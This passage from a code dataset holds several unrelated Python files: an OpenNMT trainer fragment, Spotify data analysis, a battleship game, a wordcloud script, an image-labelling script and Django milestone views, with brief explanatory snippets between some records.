Simple function to report training stats (if report_manager is set)\n see `onmt.utils.ReportManagerBase.report_training` for doc\n \"\"\"\n if self.report_manager is not None:\n return self.report_manager.report_training(\n step, num_steps, learning_rate, report_stats,\n multigpu=self.n_gpu > 1)\n\n def _report_step(self, learning_rate, step, train_stats=None,\n valid_stats=None):\n \"\"\"\n Simple function to report stats (if report_manager is set)\n see `onmt.utils.ReportManagerBase.report_step` for doc\n \"\"\"\n if self.report_manager is not None:\n return self.report_manager.report_step(\n learning_rate, step, train_stats=train_stats,\n valid_stats=valid_stats)\n\n def maybe_noise_source(self, batch):\n if self.source_noise is not None:\n return self.source_noise(batch)\n return batch\n\n\nclass LogSumExpMoE(torch.autograd.Function):\n \"\"\"Standard LogSumExp forward pass, but use *posterior* for the backward.\n See `\"Mixture Models for Diverse Machine Translation: Tricks of the Trade\"\n (Shen et al., 2019) `_.\n \"\"\"\n\n @staticmethod\n def forward(ctx, logp, posterior, dim=-1):\n ctx.save_for_backward(posterior)\n ctx.dim = dim\n return torch.logsumexp(logp, dim=dim)\n\n @staticmethod\n def backward(ctx, grad_output):\n posterior, = ctx.saved_tensors\n grad_logp = grad_output.unsqueeze(ctx.dim) * posterior\n return grad_logp, None, None\n","sub_path":"onmt/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":27633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
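+
+The LogSumExpMoE autograd function at the end of the trainer decouples the objective from credit assignment: the forward pass is a plain logsumexp, while the backward pass distributes gradient according to the fixed posterior r(z) instead of softmax(logp). A tiny numeric check, assuming the class above is in scope:
+
+import torch
+
+logp = torch.randn(4, 3, requires_grad=True)
+posterior = torch.softmax(torch.randn(4, 3), dim=1)  # stand-in for rz
+LogSumExpMoE.apply(logp, posterior, 1).sum().backward()
+assert torch.allclose(logp.grad, posterior)  # upstream grad is all ones here
+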
+{"seq_id":"396021619","text":"import os\n# get current directory as cwd\ncwd = os.getcwd()\n# check if a file or directory named 'assets' exists in our cwd\nif os.path.exists('assets')==True:\n    for name in os.listdir(cwd):\n        if 'assets' == name:\n            path = os.path.join(cwd, 'assets')\n            # check if 'assets' is a directory\n            if os.path.isdir(path)==True:\n                listItems = os.listdir(path)\n                listItems.sort()\n                print(listItems)\n                for i in listItems:\n                    print(\"self.\"+i)\n\n","sub_path":"PyCharm_Projects/ImageFileEditor/Mini Project 7/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
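+
+The directory walk above reduces to a few lines with pathlib; a sketch with the same observable output:
+
+from pathlib import Path
+
+assets = Path.cwd() / "assets"
+if assets.is_dir():
+    for item in sorted(p.name for p in assets.iterdir()):
+        print("self." + item)
+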
+{"seq_id":"314667405","text":"\n#%%\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.stats import norm\nimport pandas as pd\nfrom pandas.plotting import scatter_matrix\nimport sklearn.preprocessing as sklpre\nimport math\nimport os\nimport sys\n#%%\n# data_csv_path = os.path.abspath(os.path.dirname(sys.argv[0])) + \"\\SpotifyFeatures.csv\"\ndata_csv_path = os.path.dirname(__file__) + \"/../csv/SpotifyFeatures.csv\"\nspotifyDBData = pd.read_csv(data_csv_path, sep=',', header=0)\n\n#%%\n# Let's look at popularity - this would be expected to resemble a normal distribution\ntrackPopularity = spotifyDBData['popularity']\n\n# Find the statistical properties of the popularity\nmu = np.mean(trackPopularity)\nsigma = np.std(trackPopularity)\nsigma2 = np.var(trackPopularity)\nmedian = np.median(trackPopularity)\n\n# Create an object to plot into\nfig, ax = plt.subplots(1, 1, figsize=[10,6])\n\n# Now plot the popularity data to get an idea of its distribution\nax.hist(trackPopularity,bins=100, density=True, label='Track Popularity') # Normalises the histogram\nplt.xlabel('Popularity rating')\nplt.ylabel('Normalised Counts')\nax.axvline(mu, color='b', label = \"Mean\")\nax.axvline(median, color='r', label=\"Median\")\n\n# Try and fit a Gaussian distribution\nxarr = np.linspace(np.max(trackPopularity), np.min(trackPopularity), 500)\nax.plot(xarr, norm.pdf(xarr, mu, sigma), label='True Gaussian PDF')\nax.legend()\n\n\n#%%\naudiofeature_cols = ['popularity', 'acousticness', 'danceability', 'energy', \n                     'instrumentalness', 'liveness', 'loudness', 'speechiness', \n                     'tempo', 'valence'] \n\ndef plotFeatureDistribution(afeatures):\n\n    cols = 2    # How many subplots per row\n    width = 15  # Width of figure\n    prop = 0.6  # Subplot proportions, height/width ratio of subfigures\n\n    rows = int(len(afeatures)/cols)+1\n    height = (rows/cols)*width*prop\n\n    fig, ax = plt.subplots(rows, cols, figsize=(width,height))\n    plt.subplots_adjust(wspace=0.2, hspace=0.4)\n    for index, afeature in enumerate(afeatures):\n        row, col = int(index/cols), index % cols\n\n        feature_data = spotifyDBData[afeature]\n\n        ax[row,col].hist(feature_data, bins=50, density=True, label=afeature.capitalize())\n        ax[row,col].axvline(np.mean(feature_data), color='purple', label = \"mean\")\n        ax[row,col].axvline(np.median(feature_data), color='r', label = \"median\")\n        ax[row,col].axvline(np.percentile(feature_data, 5), color='orange', label = \"5 percentile\")\n        ax[row,col].axvline(np.percentile(feature_data, 95), color='orange', label=\"95 percentile\")\n        ax[row,col].set_title(afeature.capitalize())\n        ax[row,col].get_yaxis().set_visible(False)\n        ax[row,col].legend()\n\nplotFeatureDistribution(audiofeature_cols)\n\n#%%\n# All feature names to be used as titles for each subplot\nGenres = spotifyDBData['genre']  # Series containing genres of each track\nUniqueGenres = Genres.unique()   # Contains the name of each genre included in DB\n\nprint(UniqueGenres) # Verify \n\ncols = 4    # How many subplots per row\nwidth = 15  # Width of figure\nprop = 1/3  # Subplot proportions, height/width ratio of subfigures\n\nrows = int(len(UniqueGenres)/cols)+1\nheight = (rows/cols)*width*prop\n\nfig, ax = plt.subplots(rows, cols, figsize=(width,height))\nplt.subplots_adjust(wspace=0.2, hspace=1)\nfor index, genre in enumerate(UniqueGenres):\n    row, col = int(index/cols), index % cols\n    genre_tracks = spotifyDBData.loc[spotifyDBData['genre'] == genre]\n    popularity = genre_tracks['popularity']\n    title = genre + \", N = \" + str(len(popularity))\n    ax[row,col].hist(popularity, 
bins=40, density=True, label='Track Popularity')\n    ax[row,col].set_title(title)\n    \n\n#%%\n# Apply One Hot Encoding to the genre feature\nonehotenc = pd.get_dummies(spotifyDBData, columns=[\"genre\"])\n\n# Rename/format genre column (lowercase, no special symbols)\nreplacements = {' ':'-', '&':'n', '’':''}\nonehotenc.columns = map(lambda s: s.lower().translate(str.maketrans(replacements)), onehotenc.columns)\n\nprint(list(onehotenc.columns)) # Check column names\n\n\n\n#%% split data per genre\n\ngenres = list(filter(lambda name: \"genre_\" in name, onehotenc.columns))\naudiofeature_cols = ['popularity', 'acousticness', 'danceability', 'energy', \n                     'instrumentalness', 'liveness', 'loudness', 'speechiness', \n                     'tempo', 'valence'] \n\n\nminmaxscaler = sklpre.MinMaxScaler()\n\ndf_scaled = pd.DataFrame(onehotenc)\ndf_scaled[audiofeature_cols] = pd.DataFrame(\n        minmaxscaler.fit_transform(df_scaled[audiofeature_cols]), \n        index=df_scaled[audiofeature_cols].index,\n        columns=df_scaled[audiofeature_cols].columns)\n\n#df_genre = {}\n#genremean = {}\n#genremedian = {}\n#for genre in genres:\n#    onegenre = df_scaled.loc[df_scaled[genre] == 1]\n#    onegenre.reset_index(inplace=True, drop=True)\n#    gidx = genre.lower()\n#    \n#    df_genre[gidx] = onegenre.filter(audiofeature_cols)\n#    \n#    genremean[gidx] = df_genre[gidx].mean().values.flatten().tolist()\n#    genremedian[gidx] = df_genre[gidx].median().values.flatten().tolist()\n#    genremin[gidx] = df_genre[gidx].min().values.flatten().tolist()\n#    genremax[gidx] = df_genre[gidx].max().values.flatten().tolist()\n    \ntracks = {genre: df_scaled.loc[df_scaled[genre] == 1]\n                 .reset_index(drop=True)\n                 .filter(audiofeature_cols)\n          for genre in genres}\n    \naudiofeatures = {genre.replace(\"genre_\",\"\"): tracks[genre].describe()\n                 for genre in genres}\n\n# Mean and median\nafeatures_mean = {genre: tracks[genre].mean().values.flatten().tolist()\n                  for genre in genres}\nafeatures_median = {genre: tracks[genre].median().values.flatten().tolist()\n                    for genre in genres}\n\n#%% Radar plots\n\ndef radar_subplot(categories, data, title=None, subplotpos=(1,1,1)):\n    # Dimension angles\n    N = len(categories)\n    angles = [n / float(N) * 2 * math.pi for n in range(N)]\n    \n    # Create polar subplot\n    ax = plt.subplot(subplotpos[0],subplotpos[1],subplotpos[2], polar=True)\n    ax.set_rlabel_position(0)\n    ax.set_title(title)\n    plt.xticks(angles, categories, color='grey', size=10)\n    plt.yticks([0.2,0.4,0.6,0.8], [\"0.2\",\"0.4\",\"0.6\",\"0.8\"], color=\"grey\", size=10)\n    plt.ylim(0,1)\n    \n    # Plot one line/shape per item in data\n    plotdata = data if isinstance(data[0],list) else [data]\n    angles += angles[:1]\n    for values in plotdata:\n        plotvalues = values + values[:1] # Line finishes same place as it starts\n        ax.plot(angles, plotvalues, linewidth=1, linestyle='solid')\n        ax.fill(angles, plotvalues, 'b', alpha=0.1)\n\ndef plot_audiofeatures_radar(genres, cols=3, width=18, hspace=0.3):\n    rows = int(len(genres)/cols)+1\n    height = width*(rows/cols)    \n    plt.figure(figsize=(width,height))\n    plt.subplots_adjust(hspace=hspace)\n    for idx, genre in enumerate(genres):\n        genre = genre if genre.startswith(\"genre_\") else \"genre_\" + genre\n        categories = list(tracks[genre])\n        subplot = (rows, cols, idx+1)\n        layers = [afeatures_mean[genre], afeatures_median[genre]]\n        title = genre.replace(\"genre_\",\"\").capitalize()\n        radar_subplot(categories, layers, title, subplot)\n    \n# plot_audiofeatures_radar([\"blues\", \"classical\", \"comedy\", \"country\", \"electronic\", \n#                          \"folk\", \"jazz\", \"opera\", \"rap\", 
\"rock\", \"reggae\", \"soul\"])\n\n#%%\n\nall_genres = [\n 'dance',\n 'indie',\n 'pop',\n 'rnb',\n 'rap',\n 'reggae',\n 'reggaeton',\n 'rock',\n 'ska',\n 'folk',\n 'jazz',\n 'classical',\n 'comedy',\n 'country',\n 'electronic',\n 'hip-hop',\n 'movie',\n 'opera',\n 'soul',\n 'soundtrack',\n 'world']\nplot_audiofeatures_radar(all_genres, width=16)\n#%% Radar diagrams above work well - what we are actually doing is looking for distinctions between the genres\n# Could have been achieved by plotting mean on y, genre on x for each feature.. Tiresome, which is why radar diagrams\n# were used\n\ndef plot_nonOptimalFeaturePlot(fname, genres, width=10, hspace=0.3):\n    plt.figure(figsize=(width, width))\n    means = []\n    xtickPos = []\n    for i, genre in enumerate(genres):\n        genre = genre if genre.startswith(\"genre_\") else \"genre_\" + genre\n        findex = audiofeature_cols.index(fname)\n        means.append(afeatures_mean[genre][findex])\n        xtickPos.append(i) \n        \n    plt.bar(xtickPos, means)\n    plt.xticks(xtickPos, [genre.capitalize() for genre in genres])\n    \nfeatures = [\"popularity\",]\n\nplot_nonOptimalFeaturePlot(\"popularity\", [\"blues\", \"classical\", \"comedy\", \"country\", \"electronic\", \n                          \"folk\", \"jazz\", \"opera\", \"rap\", \"rock\", \"reggae\", \"soul\"])\n    \n    \n#%%\n    \nattributes = [\"tempo\", \"popularity\", \"acousticness\", \"danceability\", \"energy\"]\naxs = scatter_matrix(onehotenc[attributes], figsize=(20,20), alpha=0.01)\n\n\n#%%\natt2 = [\"popularity\",\"instrumentalness\", \"liveness\", \"speechiness\", \"valence\"]\naxs = scatter_matrix(onehotenc[att2], figsize=(20,20), alpha=0.01)\n\n#%%\natt3 = [\"popularity\",\"duration_ms\"]\naxs = scatter_matrix(onehotenc[att3], figsize=(20,20), alpha=0.01)\n\n#%%\natt4 = [\"duration_ms\",\"genre\"]\naxs = scatter_matrix(spotifyDBData[att4], figsize=(20,20), alpha=0.01)\n#%% How about danceability ? Can it be used to predict popularity?\nPD = spotifyDBData[['danceability','energy']]\ncorrcoef = np.corrcoef(PD.T) # note: rows=variables, columns=samples (opposite of the usual convention)\n\n\n#%% ---------------------- REMOVING ALL THE SONGS WITH A 0 POPULARITY RATING --------------------------\nprint(\"===============================================================================================\")\nprint(\"================================= PERFORMING DATA CLEANING ====================================\")\nprint(\"===============================================================================================\")\n\ngenres.remove(\"genre_a-capella\")\n# Removing ALL samples with a popularity of 0\nfor genre in genres:\n    tracks[genre] = tracks[genre][tracks[genre].popularity > 0.01]\n    \ncols = 4    # How many subplots per row\nwidth = 15  # Width of figure\nprop = 1/3  # Subplot proportions, height/width ratio of subfigures\n\nrows = int(len(UniqueGenres)/cols)+1\nheight = (rows/cols)*width*prop\n\nfig, ax = plt.subplots(rows, cols, figsize=(width,height))\nplt.subplots_adjust(wspace=0.2, hspace=1)\nfor index, genre in enumerate(genres):\n    row, col = int(index/cols), index % cols\n    #genre_tracks = spotifyDBData.loc[spotifyDBData['genre'] == genre]\n    popularity = tracks[genre]['popularity']\n    title = genre + \", N = \" + str(len(popularity))\n    ax[row,col].hist(popularity, bins=40, density=True, label='Track Popularity')\n    ax[row,col].set_title(title)\n\n# THAT'S MORE LIKE IT ! 
GREAT CLEANING!\n\n#%% -------------- CHECK THE DURATION FEATURE IF SCALING CAN BE DONE ------------------------------\ncols = 4    # How many subplots per row\nwidth = 15  # Width of figure\nprop = 1/3  # Subplot proportions, height/width ratio of subfigures\n\nrows = int(len(UniqueGenres)/cols)+1\nheight = (rows/cols)*width*prop\n\nfig, ax = plt.subplots(rows, cols, figsize=(width,height))\nplt.subplots_adjust(wspace=0.2, hspace=1)\nfor index, genre in enumerate(UniqueGenres):\n    if genre != \"A Capella\":\n        row, col = int(index/cols), index % cols\n        genre_tracks = spotifyDBData.loc[spotifyDBData['genre'] == genre]\n        duration = genre_tracks['duration_ms']\n        title = genre + \", N = \" + str(len(duration))\n        ax[row,col].hist(duration, bins=40, density=True, label='Track Duration')\n        ax[row,col].set_title(title)\n        \n        sub_mean = np.mean(duration)\n        sub_median = np.median(duration)\n        sub_max = np.max(duration)\n        print(sub_max)\n        \n        ax[row,col].axvline(sub_mean, color='b', label = \"Mean\")\n        ax[row,col].axvline(sub_median, color='r', label=\"Median\")\n        ax[row,col].axvline(sub_max, color='y', label=\"Max\")\n        \n        sub_max = 0\n        \n# Should we just filter out the outliers of duration as well? Could one go about\n# it differently, e.g. are there too many to simply assign them to the mean? The tendency\n# seems to be that duration for each genre has a nice distribution. \n# Would it be beneficial to convert units - e.g from ms to s? Decrease the size\n# of the numbers before performing the scaling? \n    \n    \n#%% What should one do about the Key feature? \ndef uniqueFeatureLabels(df, fName):\n    UniqueLabels = df[fName].unique() \n    print(\"Unique labels for \", fName,\":\", len(UniqueLabels))\n    \nuniqueFeatureLabels(spotifyDBData, \"key\") # = 12\n\n# Is it feasible to one hot encode this ? This would add an additional 11 features\n# - This combined with the genre encoding could cause feature overload? Would our model\n# Have enough samples to learn? Should this feature be dropped completely?\n\n# It has been decided to drop this feature - as our sample size is only 230000, minus the ones\n# with 0 popularity rating. For fear of improper training of the model due to the sheer size\n# of the feature list, this feature will be dropped. \n\n# ---------------- What should one do about mode? ---------------------------------\nuniqueFeatureLabels(spotifyDBData, 'mode') # = 2\n# Only expands to one additional feature - should be one hot encoded. \n# Decided to include this. Use one hot encoding. \n\n#%%\n# ------------ What should one do about time_signature feature? -------------------\nuniqueFeatureLabels(spotifyDBData, 'time_signature') # = 5\n# Is it feasible to encode into 4 additional features? ... \n# Clean this data - 1/4 and 0/4 should be removed. \n# 0/4 does not exist? Drop this. 
\nfig, ax = plt.subplots(1, 1, figsize=(width,height))\nUniqueTS = spotifyDBData['time_signature'].unique()\nN_uTS = []\nfor TS in UniqueTS:\n inSignature = spotifyDBData[spotifyDBData['time_signature'] == TS]\n N_uTS.append(len(inSignature))\n print(\"For time signature: \", TS, \", samples: \", len(inSignature))\n \n\nax.hist(N_uTS, bins=5, density=True, label='Track Popularity')\n \n\n#%% Last part, when above is done, create a new script without plots that only performs data cleaning and feature scaling\n# Let it store the result as a new csv file from which the next step in the pipeline can read from...\n\n# REMEMBER:\n# OneHotEncoder CANNOT BE USED FOR Y VALUES - USE LABELBINARIZER INSTEAD!\n\n","sub_path":"Slutprojekt/Bilag/visualization_and_preprocessing/visualization_and_cleaning.py","file_name":"visualization_and_cleaning.py","file_ext":"py","file_size_in_byte":14190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
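+
+The MinMaxScaler step in the entry above maps every audio-feature column onto [0, 1] before the per-genre splits; a hand-rolled equivalent on one made-up column:
+
+import numpy as np
+
+# x' = (x - min) / (max - min), what sklearn's MinMaxScaler applies column-wise
+tempo = np.array([60.0, 120.0, 180.0])
+scaled = (tempo - tempo.min()) / (tempo.max() - tempo.min())
+print(scaled)  # [0.  0.5 1. ]
+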
+{"seq_id":"474984276","text":"import random\n\n#Game User Preparation\ndef int_create(string):\n number_as_list=[x for x in string if x.isdigit()]\n if number_as_list==[]:\n number_as_list=[\"0\"]\n return int(\"\".join(number_as_list))\n\n#player_amount=int_create(input(\"1/2 player? \"))\n#while player_amount!=1 and player_amount!=2:\n# player_amount=int_create(input(\"1/2 player? \"))\nplayer_amount=1\nsettings={\"l1amount\":6,\"l2amount\":4,\"l3amount\":2,\"rang\":8}\n#settingnames{\"l1amount\":\"Amount of 1-length ships\",\n# \"l2amount\":\"Amount of 2-length ships\",\n# \"l3amount\":\"Amount of 3-length ships\",\n# \"rang\":\"Size of map\"}\nship_dict=[]\n\nprint(\"1 - Play\\n2 - Settings\")\nchoice=0\nwhile choice!=1 and choice!=2:\n choice=int_create(input(\"\"))\nif choice==2:\n while True:\n for setting in settings:\n print(\"{} - {}\".format(setting,settings[setting]))\n print(\"To change a setting, type it in and type the new variable.\")\n print(\"To finish changing settings, type in 'end'\")\n change=input(\"\")\n if change==\"end\":\n break\n else:\n for setting in settings:\n if setting==change:\n settings[setting]=int_create(input(\"Enter the new setting: \"))\n \n#Game Preparation\ndef show_board(board):\n for row in board:\n print(\" \".join(row))\n\ndef test_coord(coord):\n x,y=coord\n if x not in range(settings[\"rang\"]) or y not in range(settings[\"rang\"]):\n return False\n elif real_board[y][x]==\"X\":\n return False\n else:\n return True\n\ndef random_coord():\n x,y=-1,-1\n while test_coord([x,y])==False:\n x=random.randint(0,settings[\"rang\"]-1)\n y=random.randint(0,settings[\"rang\"]-1)\n return x,y\n \ndef random_direction():\n return random.randint(0,3)\n \ndef ship_extension(x,y,direction,magnitude):\n if direction==0:\n return x+magnitude,y\n if direction==1:\n return x,y+magnitude\n if direction==2:\n return x-magnitude,y\n if direction==3:\n return x,y-magnitude\n\ndef bulk_test_coord(x,y):\n if not len(x)==len(y):\n print(\"Error within the program.\")\n else:\n for coord in range(len(x)):\n if test_coord([x[coord],y[coord]])==False:\n return False\n break\n else:\n return True\n\ndef plot_points(x,y,designation):\n if not len(x)==len(y):\n print(\"Error within the program.\")\n else:\n for point_number in range(len(x)):\n real_board[y[point_number]][x[point_number]]=designation\n\ndef plot_points2(coords):\n for coord in coords:\n x,y=coord\n board[y][x]=\"/\"\n\ndef create_fake_coord_list(amount):\n x=[]\n y=[]\n for coord in range(amount):\n x.append(-1)\n y.append(-1)\n return x,y\n\ndef create_coord_list(x,y):\n if not len(x)==len(y):\n print(\"Error within the program.\")\n else:\n coords=[]\n for coord in range(len(x)):\n coords.append([x[coord],y[coord]])\n return coords\n\nboard=[]\nreal_board=[]\n\nfor row in range(settings[\"rang\"]):\n board.append(['O']*settings[\"rang\"])\n real_board.append(['O']*settings[\"rang\"]) \n\nif player_amount==1:\n for l1battleship in range(settings[\"l1amount\"]):\n x,y=random_coord()\n ship_dict.append({\"condition\":\"alive\",\"size\":1,\"coords\":[[x,y]]})\n real_board[y][x]=\"X\"\n\n for l2battleship in range(settings[\"l2amount\"]):\n x,y=create_fake_coord_list(2)\n while bulk_test_coord(x,y)==False:\n x[0],y[0]=random_coord()\n direction=random_direction()\n x[1],y[1]=ship_extension(x[0],y[0],direction,1)\n ship_dict.append({\"condition\":\"alive\",\"size\":2,\"coords\":create_coord_list(x,y)})\n plot_points(x,y,\"X\")\n\n for l3battleship in range(settings[\"l3amount\"]):\n 
x,y=create_fake_coord_list(3)\n while bulk_test_coord(x,y)==False:\n x[0],y[0]=random_coord()\n direction=random_direction()\n x[1],y[1]=ship_extension(x[0],y[0],direction,1)\n x[2],y[2]=ship_extension(x[0],y[0],direction,2)\n ship_dict.append({\"condition\":\"alive\",\"size\":3,\"coords\":create_coord_list(x,y)})\n plot_points(x,y,\"X\")\n\n#Game Start\ndef guess(variable,rang):\n coord=int_create(input(\"Which {}: \".format(variable)))-1\n while coord not in range(rang):\n coord=int_create(input(\"Invalid number, must be within the range of 1 and {}: \".format(rang)))-1\n return coord\n \ndef win_check(real_board):\n win=True\n for row in real_board:\n for col in row:\n if col==\"X\":\n win=False\n return win\n \ndef ship_check(real_board,ship_dict):\n for ship in ship_dict:\n if ship['condition']==\"alive\":\n for coord in range(len(ship[\"coords\"])):\n x,y=ship[\"coords\"][coord]\n if real_board[y][x]==\"X\":\n break\n else:\n ship['condition']='dead'\n plot_points2(ship[\"coords\"])\n print(\"You sank a battleship!\")\n \nturn_counter=0\nwhile True:\n turn_counter+=1\n show_board(board)\n row_guess,col_guess=guess(\"row\",settings[\"rang\"]),guess(\"column\",settings[\"rang\"])\n while board[row_guess][col_guess]==\"\\\\\" or board[row_guess][col_guess]==\"X\" or board[row_guess][col_guess]==\"/\":\n print(\"You've already tried this spot.\")\n row_guess,col_guess=guess(\"row\",settings[\"rang\"]),guess(\"column\",settings[\"rang\"])\n if real_board[row_guess][col_guess]==\"X\":\n board[row_guess][col_guess]=\"\\\\\"\n real_board[row_guess][col_guess]=\"Y\"\n print(\"You've hit a battleship\")\n ship_check(real_board,ship_dict)\n if win_check(real_board)==True:\n break\n else:\n board[row_guess][col_guess]=\"X\"\n print(\"You missed.\")\nprint(\"Congratulations, you won!\")\nprint(\"Your victory took {} turns.\".format(turn_counter))\n \n \n \n \n","sub_path":"simple battleship.py","file_name":"simple battleship.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
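+
+ship_extension in the entry above encodes directions 0-3 as +x, +y, -x and -y offsets from the starting square; a quick check of that mapping, assuming the function is in scope:
+
+assert ship_extension(3, 3, 0, 2) == (5, 3)  # east by two squares
+assert ship_extension(3, 3, 3, 1) == (3, 2)  # up one row in array coordinates
+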
+{"seq_id":"455902697","text":"# -*- coding: utf-8 -*-\n'''\nGenerate word clouds from the words extracted by jieba\n'''\nimport jieba.analyse\nimport numpy as np\nfrom PIL import Image\nfrom wordcloud import WordCloud\nimport codecs\npath = 'data/十一/'\nOUT_FILE_NAME = (path+'her_words_out.txt', path+'my_words_out.txt')\nOUT_IMG_NAME = (path+'her_wordcloud.png', path+'my_wordcloud.png')\nSHAPE_IMG_NAME = (path+'辉.png', path+'十一.png')\nSTOP_WORDS = [u'图片', u'表情', u'窗口', u'抖动', u'哈哈', u'嘻嘻', u'啊啊啊', u'哈哈哈']\nALTER_WORDS = {u'被替换词1':u'替换词1',u'被替换词2':u'替换词2'}\n\ndef make_wordcould(in_files, out_files, shape_files):\n    \"\"\"make wordcloud\"\"\"\n    for in_file, out_file, shape_file in zip(in_files, out_files, shape_files):\n        shape = np.array(Image.open(shape_file))\n        content = codecs.open(in_file, 'r', encoding='utf-8').read()\n        tags = jieba.analyse.extract_tags(content, topK=120, withWeight=True)\n        text = {}\n        for word, freq in tags:\n            if word not in STOP_WORDS:\n                if word in ALTER_WORDS:\n                    word = ALTER_WORDS[word]\n                text[word] = freq\n        # for word, freq in tags:\n        #     text[word] = freq\n        print(text)\n        wordcloud = WordCloud(background_color='white', font_path='FZYTK.TTF', mask=shape, width=1080, height=720).generate_from_frequencies(text)\n        wordcloud.to_file(out_file)\n\nif __name__ == '__main__':\n    make_wordcould(OUT_FILE_NAME, OUT_IMG_NAME, SHAPE_IMG_NAME)\n","sub_path":"chat_content_process/3.wordcloud_words.py","file_name":"3.wordcloud_words.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
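+
+What extract_tags hands to generate_from_frequencies above is a list of (word, TF-IDF weight) pairs; a minimal sketch of that step on a throwaway string:
+
+import jieba.analyse
+
+tags = jieba.analyse.extract_tags("深度学习让聊天记录变成词云", topK=5, withWeight=True)
+freqs = {word: weight for word, weight in tags}
+print(freqs)
+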
+{"seq_id":"179056159","text":"# coding:utf-8\n\nimport copy\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom skimage import measure, io\n\n\ndef adjunction_image(image):\n row, col = image.shape\n ad_image = np.zeros((row + 2, col + 2))\n for i in range(row):\n for j in range(col):\n ad_image[i + 1][j + 1] = image[i][j]\n return ad_image\n\n\ndef adjunction_image_min(image):\n row, col = image.shape\n ad_image = np.zeros((row - 2, col - 2))\n for i in range(1, row - 1, 1):\n for j in range(1, col - 1, 1):\n ad_image[i - 1][j - 1] = image[i][j]\n return ad_image\n\n\ndef fff():\n img_ori = io.imread(\"./Test_Img/chos lugs-pan chen blo chos kyi rgyal mtshan gsung 'bum-1-0002_1_369.png\",\n as_grey=True)\n img_ori = adjunction_image(img_ori)\n img = np.where((copy.copy(img_ori)) > 245, 0, 1)\n lab_img = measure.label(img)\n regions = measure.regionprops(lab_img)\n for region in regions:\n if region.label != 1:\n area = region.coords\n for i in range(len(area)):\n row, col = area[i][0], area[i][1]\n img_ori[row][col] = 255\n p1 = plt.subplot(211)\n p1.imshow(adjunction_image_min(lab_img), cmap='gray')\n\n p2 = plt.subplot(212)\n p2.imshow(adjunction_image_min(img_ori), cmap='gray')\n plt.show()\n\n\nimport time\n\nnowtime = time.time()\ntime.sleep(1)\nprint(time.strftime('%M-%S', time.localtime(time.time() - nowtime)))\n\ns = np.arange(0, 32, 2)\nprint(len(s))\n","sub_path":"Corner/my/tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
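+
+The cleanup in the entry above whitens every connected component except the first; the primitive underneath is skimage's label/regionprops pair:
+
+import numpy as np
+from skimage import measure
+
+img = np.array([[0, 1, 1, 0],
+                [0, 1, 0, 0],
+                [0, 0, 0, 1]])
+labels = measure.label(img)               # background stays 0
+for region in measure.regionprops(labels):
+    print(region.label, region.area, region.coords.tolist())
+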
+{"seq_id":"93724639","text":"from django.shortcuts import render\nfrom django.shortcuts import render, render_to_response\nfrom django.core.paginator import Paginator,InvalidPage, EmptyPage\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom milestones.models import Milestone\nfrom milestones import *\nfrom tasks.models import Tasks\nfrom client.models import Client\nfrom forms import *\nfrom projects.models import *\nfrom django.core.context_processors import csrf\nfrom django.template import RequestContext\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.template.defaultfilters import slugify\nfrom django.db import IntegrityError\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import *\nfrom documents.models import *\nfrom django.contrib.comments import Comment\nfrom mastermodule.models import *\nfrom django.contrib.sites.models import Site\n# Create your views here.\n\n\ndef view(request, id_disp):\n# disp = request.GET.get('id')\n mil_obj = Milestone.objects.get(id=id_disp)\n #tk = Tasks.objects.get(id=id_disp)\n tasks = Tasks.objects.filter(milestone=mil_obj)\n\n documents = Milestone_Document.objects.all()\n return render(request, \"milestones/milestone_view.html\", locals())\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef milestone_view(request, id_disp):\n todays = datetime.date.today()\n mil_obj = Milestone.objects.get(id=(id_disp))\n cont_type = ContentType.objects.get_for_model(mil_obj)\n news_feed = Recently_Viewed.objects.create(user = request.user, content_type = cont_type, object_id = mil_obj.id,)\n task_list = Tasks.objects.filter(milestone = mil_obj).order_by('id')\n #task_list = Tasks.objects.all()\n #documents = Document.objects.filter(milestone = mil_obj)\n #docs = Document.objects.filter(content_type = content_type, objects_id = mil_obj.id )\n #cont_type = ContentType.objects.get_for_model(mil_obj)\n #comment = Comment.objects.filter(content_type = cont_type, object_pk = mil_obj.id, is_public = True)\n content_type = ContentType.objects.get_for_model(mil_obj)\n comment = Comment.objects.filter(content_type = content_type, \\\n object_pk = mil_obj.pk, is_public = True)\n# doc = Document.objects.filter(content_type = content_type, objects_id = mil_obj.pk )\n\n return render(request, \"milestones/milestone_view.html\", locals())\n\n\n@login_required(login_url=\"/login/\")\ndef wide_view(request):\n wid = Milestone.objects.all()\n widtask = Tasks.objects.all()\n return render(request, \"milestones/wide_view.html\", locals())\n\n\nimport datetime\n@login_required(login_url=\"/login/\")\ndef overdueview(request):\n peoples = UserProfile.objects.all()\n todays = datetime.date.today()\n overdue_list = Milestone.objects.filter(due_date__lt=todays, status=False, owned_by__user=request.user)\n return _filter_function(request, overdue_list)\n\n\n@login_required(login_url=\"/login/\")\ndef addmilestone(request, task=None, id=None):\n f = Milestone_Form(request.user.pk)\n form = f\n error = ''\n todays = datetime.date.today()+timedelta(days=7)\n msg = ''\n nam = ''\n x = ''\n f = ''\n user_id=request.user.id\n user_id2 = UserProfile.objects.get(user__id=user_id)\n if task == 'add':\n if request.method == 'POST':\n form = form(request.POST)\n client_id = request.POST.get('client')\n project_id = request.POST.get('project')\n available_task = request.POST.getlist('available_task')\n name = request.POST.get('name', '')\n if form.is_valid():\n f = form.save(commit=False)\n f.slug=name\n if client_id:\n client_obj 
